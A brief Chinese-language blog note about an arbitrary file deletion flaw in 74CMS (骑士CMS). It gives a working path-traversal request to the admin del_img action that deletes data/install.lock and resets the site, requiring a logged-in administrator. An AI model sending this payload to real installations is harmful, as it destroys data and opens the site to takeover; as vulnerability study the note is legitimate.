【笔记】骑士CMS的任意文件删除漏洞 发表于 2024-05-21 更新于 2024-09-16 阅读次数: 前言 骑士CMS(74CMS)的任意文件删除漏洞 前提条件 后台管理员为已登录状态 正文 /data/install.lock:骑士CMS中的install.lock文件被删除后,骑士CMS会恢复出厂设置 request1GET http://127.0.0.1/admin/admin_article.php?act=del_img&img=../../data/install.lock 完成 参考文献 哔哩哔哩——xiaodisec